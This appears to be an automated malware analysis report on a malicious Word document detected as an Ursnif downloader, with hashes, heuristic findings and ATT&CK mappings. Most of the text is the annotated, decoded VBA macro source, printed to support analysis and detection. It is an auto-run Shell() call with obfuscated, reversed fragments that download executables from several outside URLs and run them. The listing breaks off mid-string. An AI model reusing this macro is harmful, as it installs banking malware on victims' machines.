Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8da3fba101fa6583…

MALICIOUS

Office (OLE)

Size: 70.5 KB · Created: 2018-09-11 07:42:00 · Authoring application: Microsoft Office Word · First seen: 2019-04-18
MD5: d79145e6e454b68f05e744bdf2181471 · SHA-1: 6aa2d861f55b68222c19994cbb66df0468c5d6c9 · SHA-256: 8da3fba101fa658307ba8fee02f80f1f3f3fee4ee23cfdfc016b46198d7006b6
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic) · T1204.002 (Malicious File) · T1059 (Command and Scripting Interpreter)

The sample contains a Document_Open VBA macro that calls the Shell() function, indicating an attempt to execute an arbitrary command as soon as the document is opened. The ClamAV detection 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader family. The VBA script is obfuscated, but the Shell() call — whose command line is assembled at runtime from helper-function return values — together with the downloader heuristic points to the execution of a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5829 bytes
SHA-256: 74e06409e7c7db8acbeafd67e68153846ad79714f9487b68337011c21fbb4053
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kBWvMBPMwEk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba. VB_Base = "1Normal.ThisDocument" indicates
' this is the document's ThisDocument class module, which is where Word looks for
' a Document_Open event handler; that is what lets the Sub below run without any
' user action beyond opening the file (subject to the host's macro settings).
' The module name itself is random-looking, consistent with the rest of the
' obfuscation in this sample.
' Auto-run entry point: Word's Document_Open event handler (the OLE_VBA_DOCOPEN
' finding). It has exactly one live statement, the Shell() call below; every
' other line is inert padding.
' The `On Error Resume Next` written across line continuations suppresses all
' runtime errors, so a failing Shell() would not surface to the user.
Private Sub Document_open()
On _
Error _
Resume _
Next
   ' Each `VarType "a" + "b"` evaluates a string concatenation and discards the
   ' result; it has no side effect. These look like junk statements inserted to
   ' dilute signature matching — the same pattern recurs in the helper modules.
   VarType "roX" + "1411"
   VarType "RiPjXOpbYcz" + "6904" + "dMzsRndd" + "swiZd"
   VarType "Vi" + "GajPv" + "YjkK" + "BGjj"
   VarType "tT" + "335271017" + "jEKDHoL" + "477737334"
' The OLE_VBA_SHELL finding. The command line is never present as a literal:
' it is concatenated at runtime from the return values of three helper
' functions (bPMlIGWcBB and YqnwbZYA are in the listing below; rZnYsPNKodY is
' beyond the truncated portion). Format(vbHide) yields the string "0", which
' Shell coerces back to vbHide, so the spawned process window is hidden.
' For detection, the reassembled command line is visible at process creation
' (parent WINWORD.EXE spawning the child named in the first fragment).
Shell bPMlIGWcBB + YqnwbZYA + rZnYsPNKodY, Format(vbHide)
   VarType "PDmFHHi" + "lOqv"
   VarType "119909393" + "6640" + "U" + "328240991"
   VarType "313429696" + "LIzYF" + "404746772" + "382355318"
   VarType "3054" + "F" + "iThj" + "361443742"
   VarType "6296" + "6265"
End Sub



Attribute VB_Name = "QQQmmszvVwUt"
' Second (standard) module: holds the string-building helpers whose return
' values Document_open concatenates into the Shell() command line.
' Builds the first segment of the Shell() command line and returns it as a
' Variant (no `As` clause). No parameters.
' Obfuscation techniques visible here:
'   - Chr() on an arithmetic sum instead of a character literal, e.g.
'     8 + 2 + 17 + 18 + 54 = 99, i.e. a plain ASCII letter; wrapping it in
'     Format() is an identity on a one-character string.
'   - Literals split into many short "+"-joined pieces.
'   - Caret (^) characters stuffed into the text; cmd.exe strips them as escape
'     characters, so they only defeat static string matching.
'   - Some fragments are stored reversed (e.g. "^kaer^b") and are meant to be
'     reassembled by the spawned interpreter, not by VBA.
' The first fragment resolves to an interpreter invocation with delayed
' environment-variable expansion (`/V:`), which is why later fragments are
' `set` assignments. Decoding the full command is left to sandboxing; the
' detection-relevant facts are the caret-laden command line and the
' WINWORD.EXE → child-process relationship.
Function bPMlIGWcBB()

' Suppress all runtime errors for the rest of the function.
On _
Error _
Resume _
Next
' Inert VarType padding, as in Document_open.
VarType "rNwju" + "uiiiXBlrHrR" + "6433" + "72373681"
   VarType "299279284" + "i"
tzjaDrmP = Format(Chr(8 + 2 + 17 + 18 + 54)) + "md " + "/V:/" + Format(Chr(5 + 1 + 12 + 12 + 37)) + Format(Chr(2 + 0 + 5 + 5 + 22)) + "^s^" + "et " + "7^9="
VarType "PmtPwjACR" + "248204988"
EUZVLY = "^  " + "^ " + "^  ^ " + "     " + " ^ " + "^" + "  ^ ^" + " }}^{h"
VarType "3543" + "7673"
zVHvcbS = Format(Chr(8 + 2 + 17 + 18 + 54)) + "t" + "a" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "};" + "^kaer^b" + "^;w" + "^p^"
VarType "Kj" + "mmbG"
FUhOlBGFYF = "s$ " + "^me" + "t" + "I^" + "-^ekov" + "n" + "^I^;)w"
VarType "460229281" + "lEkH"
   VarType "5973" + "1504"
   VarType "jS" + "356562770"
   VarType "153362645" + "308592253"
   VarType "4820" + "JWQNjhzA" + "458441538" + "zvdcG"
dcEmwGqdzfS = "p^s$" + "^ ^,l^G" + "n^$" + "(e^l^i" + "^F^"
' Return value: the five fragments joined in declaration order. Under
' `On Error Resume Next`, a failure in any fragment would silently leave that
' variable Empty and the returned string shorter.
bPMlIGWcBB = tzjaDrmP + EUZVLY + zVHvcbS + FUhOlBGFYF + dcEmwGqdzfS
   VarType "jwpr" + "iubMjfiOGbisKL"
   VarType "CXOOuuN" + "fMH" + "hsU" + "119472988"
   VarType "Gik" + "wQwNFskKt"
End Function
Function YqnwbZYA()

On _
Error _
Resume _
Next
VarType "4403" + "h"
FoUESfST = "d^" + "ao" + "^lnwo^D" + ".wFR" + "^$" + "{yrt^{" + ")^bb" + "^" + "u^$ ni" + " lGn$"
VarType "iQFjDpiIG" + "cSEMzO" + "NGqvXUGpc" + "1069"
   VarType "475621159" + "ni" + "174572205" + "353062107"
TYoWGXJFo = "(h" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "aer^of" + ";'e^x" + "^" + "e" + ".'+^" + "O^hN" + "^$^+^'\" + "'^+" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^il" + "b^u^p"
VarType "hE" + "AQRD"
   VarType "KRJQKbDPXT" + "VEfXZbUlK"
   VarType "415574151" + "zwYSD"
   VarType "rbib" + "121996925"
LSHzjb = ":vn" + "^e^$=wp" + "s$" + "^;^" + "'14" + "1' ^=^ " + "^O^h"
VarType "RlmKaililwhSUz" + "nb"
   VarType "9017" + "jTUFiVdpBnbW"
   VarType "lnRqqR" + "wpaCfKI"
ohjHllKUNzn = "N$^;)" + "^" + "'^@'" + "(^t^i^l" + "^pS.'^" + "Em6" + "^"
VarType "250733332" + "h" + "3981" + "L"
   VarType "ftDVEwhYX" + "8725" + "197448434" + "Afk"
amCSdXY = "xd^0" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "Oq^3/" + "mo" + Format(Chr(8 + 2 + 17 + 18 + 54)) + ".y" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "na" + "^t^" + "lus" + "n^o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "yarr^a" + "//^:^p^" + "t^" + "th^@" + "r^yy^"
VarType "OZ" + "hqA" + "490245544" + "pjR"
   VarType "220687325" + "vtDjvHiQW"
   VarType "6117" + "V"
bJmLilr = "u^Y^jru" + "^U^" + "j/m^o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^" + "." + "y^g^o^" + "l^on" + "h" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "ett^" + "en^al^p" + "^l" + "la^ms/" + "/" + "^:^p^tt" + "h@hKVE^"
VarType "521648886" + "rwK" + "6455" + "qijj"
fqIOUmwlb = "zvp/et^" + "i^s" + "go^l/" + "ku" + "^.o" + Format(Chr(8 + 2 + 17 + 18 + 54)) + "^.^gnit" + "so^" + "h^x^ihp" + "ar^"
VarType "431892865" + "1818" + "Jqw" + "A"
zzhKdJ = "g//^:p" + "tth" + "@^p^y^i" + "bepYh/^" + "mo" + Format(Chr(8 + 2 + 17 + 18 + 54)) + ".nuf" + "^-" + "p^m^u^"
VarType "T" + "pBvENGLRVSGHI"
   VarType "6342" + "k" + "457036030" + "V"
   VarType "KGd" + "zfUQ" + "crhRqw" + "RMOdfqYjpPXz"
   VarType "Tu" + "qn" + "DlUi" + "199802182"
oYPjczzl = "jn" + "^en" + "o" + "ys//^:" + "^p" + "t^t
... (truncated)